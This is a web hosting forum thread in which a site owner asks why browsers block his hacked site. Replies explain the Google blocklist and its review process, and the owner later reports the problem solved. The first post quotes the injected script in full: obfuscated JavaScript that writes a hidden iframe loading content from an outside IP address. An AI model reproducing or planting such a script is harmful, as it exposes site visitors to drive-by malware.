Results 1 to 4 of 4

Thread: Reported Attack Page!

  1. #1
    Join Date
    Feb 2009
    Posts
    37

    Question Reported Attack Page!

    Hi,

    I have some problem in my site. My site was hacked. When i was open a site given below Error msg is in index page

    This web page at https://www.nevadacfg.com/ has been reported as an attack page and has been blocked based on your security preferences.

    In my index page given below script was added. I delete the script.

    <script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35% 2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f %2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace('vde', 'i');str =str.replace('pog', 'fr');str = str.replace('nbt', 'ame');str =str.replace('Oaoz5', 'width');str =str.replace('vxoq5','height');document.write(str) ;</script>

    Note:
    Now This error message didn't display in IE(internet Explorer). Error has been displayed in Mozilla Google chrome.

    The Site was Working perfectly in IE

    Any one help me.

    Thanks & Regards,
    Thirumalai.S
    Last edited by thirumalai; 06-08-2010 at 10:51 AM.

  2. #2
    Join Date
    Jul 2009
    Location
    New York
    Posts
    465

    Default

    if you clicked on the why was this page blocked it'll direct you to google.com/webmasters to get it reviewed and corrected.
    Happily on a Link3. Feel free to request a refferal code that takes a 10% lifetime discount off your hosting.
    Please open a SUPPORT TICKET AND CALL vpslink to resolve your vpslink problems FIRST
    I am a CUSTOMER Only. Any vpslink issues should be directed to Matt@VPSLink and/or Michael@VPSLink

  3. #3
    Join Date
    Jun 2008
    Location
    California
    Posts
    338

    Default

    Thats because IE doesn't use Google's "List of Bad Sites"
    Firefox and Chrome do. Like Cwewmpz said, theres a link on the "Attack page" that tells webmasters how to get their site reviewed and removed from the list.
    Note: my views are my own and do not reflect those of VPSLink

  4. #4
    Join Date
    Feb 2009
    Posts
    37

    Default Problem solved

    Thank you The Universes & Cwewmpz. Now The problem was solved. I request to the google. review my site. Now it is working. Thanks Lot.

    Thanks & Regards,
    Thirumalai.S

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •